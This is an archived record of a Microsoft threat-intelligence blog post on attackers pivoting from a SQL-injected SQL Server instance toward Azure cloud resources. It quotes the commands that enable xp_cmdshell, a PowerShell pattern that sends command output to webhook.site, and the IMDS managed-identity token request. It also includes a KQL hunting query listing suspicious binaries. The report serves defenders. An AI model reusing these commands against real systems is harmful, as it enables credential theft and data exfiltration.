{
	"id": "225e9c5b-e8f3-4448-a771-5348fdb756c0",
	"created_at": "2026-04-06T00:13:01.362919Z",
	"updated_at": "2026-04-10T03:21:31.697865Z",
	"deleted_at": null,
	"sha1_hash": "41f08e7bcce8b3b5846c35e9ce2fbf496202cddd",
	"title": "Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 314176,
	"plain_text": "Defending new vectors: Threat actors attempt SQL Server to cloud\r\nlateral movement | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2023-10-03 · Archived: 2026-04-05 18:46:38 UTC\r\nMicrosoft security researchers recently identified a campaign where attackers attempted to move laterally to a cloud\r\nenvironment through a SQL Server instance. This attack technique demonstrates an approach we’ve seen in other cloud\r\nservices such as VMs and Kubernetes cluster, but not in SQL Server. The attackers initially exploited a SQL injection\r\nvulnerability in an application within the target’s environment. This allowed the attacker to gain access and elevated\r\npermissions on a Microsoft SQL Server instance deployed in Azure Virtual Machine (VM). The attackers then used the\r\nacquired elevated permission to attempt to move laterally to additional cloud resources by abusing the server’s cloud\r\nidentity. Cloud identities are commonly used in cloud services including SQL Server and may possess elevated permissions\r\nto carry out actions in the cloud. This attack highlights the need to properly secure cloud identities to defend SQL Server\r\ninstances and cloud resources from unauthorized access.\r\nThe attack flow we observed initiated multiple Microsoft Defender for SQL alerts that allowed us to identify and analyse the\r\ncloud lateral movement technique. The alerts also allowed us to quickly deploy additional protections despite not having\r\nvisibility of the application that was targeted with the SQL injection vulnerability to access the SQL Server. While our\r\nanalysis of this attack did not yield any indication that the attackers successfully moved laterally to the cloud resources, we\r\nassess that it is important for defenders to be aware of this technique used in SQL Server instances, and what steps to take to\r\nmitigate potential attacks.\r\nFigure 1. SQL Server instance to cloud attack chain\r\nIn this blog post, we elaborate on the attack flow and focus on the main technique that we observed: SQL Server to cloud\r\nlateral movement. We will also show how Microsoft Defender for SQL can detect activities related to this type of threat and\r\nhelp responders mitigate such attacks.\r\nCloud-based lateral movement\r\nAs more organizations move to the cloud, we see new types of cloud-based attack techniques that are fundamentally\r\ndifferent than the ones that are known from on-premises environments. An example of this is how attackers are finding new\r\nvectors to perform lateral movement from certain on-premises environments into cloud resources.\r\nIn cloud environments, one of the methods to perform lateral movement is by abusing cloud identities that are bound to the\r\ncloud resource. Cloud services like Azure use managed identities for allocating identities to the various cloud resources.\r\nThose identities are used for authentication with other cloud resources and services. While managed identities offer\r\nadvantages in terms of convenience, security, and efficiency, they also come with certain risks that introduce a potential\r\nattack vector.\r\nFor example, if attackers compromised a VM, they could acquire a token for its attached identity by querying the instance\r\nmetadata service (IMDS) endpoint. With the managed identity access token, the attackers could perform various malicious\r\noperations on the cloud resources that the identity has access to. In the attack we observed, the attackers attempted to\r\nperform identity-based lateral movement in an environment where we haven’t seen this technique used before: SQL Server\r\ninstances.\r\nKnown technique, new environment: from SQL Server to cloud\r\nWhile the attempt to move laterally from the SQL Server instance can be considered new, the attack involved activities\r\ncommon to SQL Server attacks. For example, the initial access vector was a successful SQL injection attack that allowed the\r\nattackers to run queries on the SQL Server. The attackers launched numerous SQL statements to gather data about the host,\r\ndatabases, and network configuration. The information that the attackers collected included:\r\nDatabases\r\nhttps://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/\r\nPage 1 of 4\n\nTable names and schema\r\nDatabase version\r\nNetwork configuration\r\nReadwritedelete permissions\r\nWe assess that it is likely that the application targeted with the SQL injection vulnerability had elevated permissions, thus\r\ngranting the attackers a similar level of access. The attackers used this elevated permission to turn on the xp_cmdshell\r\ncommand, a method to launch operating system (OS) commands through a SQL query. Since xp_cmdshell is turned off by\r\ndefault to prevent exploitation, the attackers used the permissions they acquired to change the SQL configuration and ran the\r\nfollowing commands to turn on xp_cmdshell:\r\n1. “EXEC master..sp_configure ‘SHOW advanced options’,1; “RECONFIGURE WITH OVERRIDE;”\r\n2. “EXEC master..sp_configure ‘xp_cmdshell’, 1; RECONFIGURE WITH OVERRIDE;”\r\n3. “EXEC master..sp_configure ‘SHOW advanced options’,0; RECONFIGURE WITH OVERRIDE;”\r\nAfter enabling xp_cmdshell, the attackers manually initiated a series of operating system commands to launch the next\r\nphases of the attack. By using xp_cmdshell, the attackers were able to operate as if they had a shell on the host.\r\nTo collect data, the attackers used simple methods such as reading directories, listing processes, and checking network\r\nshares. The attackers downloaded several executables and PowerShell scripts that are encoded and compressed. Most of the\r\nattacker’s actions from this point were through PowerShell commands, scripts, and modules.\r\nFor persistence, the attackers used a scheduled task to launch a backdoor script. In addition, the attackers tried to get\r\ncredentials by dumping SAM and SECURITY registry keys.\r\nThe attackers used a unique method for data exfiltration: they utilized a publicly accessible service called “webhook.site”.\r\nThis service functions as a free platform for inspecting, debugging, and receiving incoming HTTP requests and emails. Any\r\nrequest directed to this address is promptly logged. The commands are in this pattern: Command | Out-String ;Invoke-WebRequest -Uri https[:]//webhook.site/G-UID. Utilizing this method for data exfiltration allowed the attackers to operate\r\ndiscreetly when transmitting outgoing traffic, as the selected service can be considered as legitimate.\r\nWhile looking at the technique used by the attackers to perform lateral movement, we encountered a familiar method\r\nimplemented in a distinct environment: the attackers tried utilizing the cloud identity of the SQL Server instance by\r\naccessing the IMDS and obtaining the cloud identity access key. The IMDS is a RESTful web service that runs on a local IP\r\naddress (169.254.169[.]254) and provides information about the VM, such as the VM’s region, tags, and the identity token.\r\nThe identity token is a JSON Web Token (JWT) that contains the claims and the signature of the identity.\r\nThe request to IMDS identity’s endpoint returns the security credentials (identity token) for the cloud identity. For example,\r\nin Azure this request would look like: hxxp://169.254.169[.]254/metadata/identity/oauth2/token?api-version=2018-02-\r\n01\u0026resource=https://management.azure.com/\r\nWith the identity token, the attackers can perform various operations on cloud resources that the cloud identity has access to.\r\nThey can perform lateral movement across the cloud environment, thus getting access to external services. While the\r\nattackers in this case were unsuccessful in attempts to take advantage of this technique due to an error, we strongly\r\nrecommend defenders to apply the best practices we provide in this blog post to protect environments against attacks that\r\nmay use the same technique.\r\nConclusion\r\nTo summarize, this attack demonstrates the attempt to leverage cloud identities in a SQL Server instance for lateral\r\nmovement. This is a technique we are familiar with in other cloud services such as VMs and Kubernetes cluster but haven’t\r\nseen before in SQL Server instances. We have observed numerous attacks attempting to leverage cloud identities in\r\nKubernetes and are aware of the potential risks and impact that can result from unauthorized access to their identity tokens.\r\nSimilarly, in SQL Server, cloud identities are also commonly employed and might possess elevated permissions to carry out\r\nactions in the cloud. Not properly securing cloud identities can expose SQL Server instances and cloud resources to similar\r\nrisks. This method provides an opportunity for the attackers to achieve greater impact not only on the SQL Server instances\r\nbut also on the associated cloud resources.\r\nWith the increasing adoption of cloud technology, attackers and threat actors are utilizing known attack techniques in new\r\nenvironments and are becoming more sophisticated. This evolving landscape of cloud-based attack techniques, with lateral\r\nmovement being one of them, emphasizes the need for organizations to ensure strong defenses and safeguarding of critical\r\nassets in the cloud.\r\nThis attack also highlights the importance of least privilege practices when designing and deploying cloud-based and on-premises solutions. Attackers are often able to conduct further malicious activities through abusing over-privileged\r\nprocesses, accounts, managed identities, and database connections. In this case, organizations are recommended to ensure\r\nthat all applications are updated and secured and are given only the necessary permissions and privileges, to avoid putting\r\nconnected SQL Server instances, as well as other cloud resources, at risk.\r\nhttps://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/\r\nPage 2 of 4\n\nDetection\r\nMicrosoft Defender for Cloud\r\nThe Microsoft Defender for Cloud helps to discover and mitigate potential database vulnerabilities and detects anomalous\r\nactivities that may be an indication of a threat to SQL databases, SQL Servers on machines, open-source databases, and\r\nAzure Cosmos DB through Microsoft Defender for SQL.\r\nThe following Defender for SQL alerts might indicate threat activity like the threat described in this blog post:\r\nPotential SQL injection\r\nA possible vulnerability to SQL Injection\r\nSQL Server potentially spawned a Windows command shell and accessed an abnormal external source\r\nAs a cloud-based next-generation database protection solution, Defender for SQL is continuously updated with new\r\ndetection capabilities and can now detect IMDS calls from SQL Server instances, the technique described in this article.\r\nFigure 2. The new alert variant could help detect and mitigate lateral movement\r\nMicrosoft Defender for Cloud also features Microsoft Defender for Resource Manager that analyzes Azure control plane\r\noperations to find abnormal behavior of cloud identities. This coverage can help find lateral movement activities in your\r\ncloud environment.\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts might indicate threat activity related to this threat, specifically the use\r\nof the xp_cmdshell command. Note, however, that these alerts can also be triggered by unrelated threat activity.\r\nSQL Server login using xp_cmdshell\r\nSuspicious SQLCMD activity\r\nMitigation\r\nThe vulnerability assessment solution in Defender for SQL can also detect vulnerabilities and misconfigurations in the\r\ndatabase. Mitigating and responding to vulnerabilities reduces the attack surface of the SQL Server and can prevent potential\r\nattacks. One of the SQL vulnerability assessment rules involves the enablement of xp_cmdshell, providing a means to\r\nidentify database instances where this setting is enabled.\r\nWith this coverage of the wide aspects of lateral movement in the cloud, and the correlations between them, organizations\r\ncan strengthen their defenses and safeguard their critical assets from the risk of lateral movement. We also recommend\r\nfollowing security best practices for managed identities to prevent lateral movement in the cloud. By implementing those\r\nsecurity measures and adhering to the least privilege principle when granting permissions to managed identities,\r\norganizations can reduce the attack surface of those identities.\r\nHunting queries\r\nMicrosoft 365 Defender\r\nMicrosoft 365 Defender is becoming Microsoft Defender XDR. Learn more.\r\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\r\nhttps://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/\r\nPage 3 of 4\n\nSQL Server abuse\r\nSQL Server offers a vast array of tools for automating tasks, exporting data, and running scripts. These legitimate tools can\r\nbe repurposed by attackers. Because there are so many powerful commands an attacker might exploit, hunting for malicious\r\nactivity involving SQL Server can be complicated.\r\nThis query detects instances of a SQL Server process launching a shell to run one or more suspicious commands.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nlet relevantCmdlineTokens = pack_array\r\n(\"advpack.dll\",\"appvlp.exe\",\"atbroker.exe\",\"bash.exe\",\"bginfo.exe\",\"bitsadmin.exe\",\"cdb.exe\",\"certutil.exe\",\"cl_invocation.ps1\",\"c\r\nWebRequest\",\"makecab.exe\",\"manage-bde.wsf\",\"mavinject.exe\",\"mftrace.exe\",\"microsoft.workflow.compiler.exe\",\"mmc.exe\",\"msbuild.exe\",\r\ncimprovider.exe\",\"regsvcs.exe\",\"regsvr32.exe\",\"replace.exe\",\"rundll32.exe\",\"runonce.exe\",\"runscripthelper.exe\",\"schtasks.exe\",\"scri\r\nDeviceProcessEvents\r\n| where Timestamp \u003e= ago(10d)\r\n| where InitiatingProcessFileName in~ (\"sqlservr.exe\", \"sqlagent.exe\", \"sqlps.exe\", \"launchpad.exe\")\r\n| summarize DistinctProcessCommandLines = tostring(makeset(ProcessCommandLine)) by DeviceId, bin(Timestamp, 2m)\r\n| where DistinctProcessCommandLines has_any(relevantCmdlineTokens)\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can deploy the Azure SQL solution that allows security analysts and administrators to rapidly\r\ndeploy a range of detection and hunting queries to their Microsoft Sentinel environment. For instance, the solution’s\r\nanalytical rules assist in pinpointing unique SQL queries that attempt or succeed in executing commands – such as attempts\r\nto execute shell commands, suggestive of potential security risks. Additionally, the hunting queries will highlight instances\r\nwhere potentially risky stored procedures like xp_cmdshell are called upon.\r\nMicrosoft Sentinel has a range of detection and threat hunting content that customers can use to detect the activity detailed\r\nin this blog:\r\nAttempts to execute shell command\r\nSuspicious stored procedures like xp_cmdshell\r\nIf the Azure SQL Solution is not currently deployed, Microsoft Sentinel customers can install the solution from the Content\r\nHub to have the rules deployed in their Sentinel workspace. More details on the Content Hub can be found here: \r\nhttps://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.\r\nSunders Bruskin, Hagai Ran Kestenberg, Fady Nasereldeen, Cloud researchers in Microsoft Threat Intelligence team\r\nFurther reading\r\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat\r\nIntelligence Blog: https://aka.ms/threatintelblog.\r\nTo get notified about new publications and to join discussions on social media, follow us on Twitter\r\nat https://twitter.com/MsftSecIntel.\r\nSource: https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/\r\nhttps://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/"
	],
	"report_names": [
		"defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement"
	],
	"threat_actors": [],
	"ts_created_at": 1775434381,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.pdf",
		"text": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.txt",
		"img": "https://archive.orkl.eu/41f08e7bcce8b3b5846c35e9ce2fbf496202cddd.jpg"
	}
}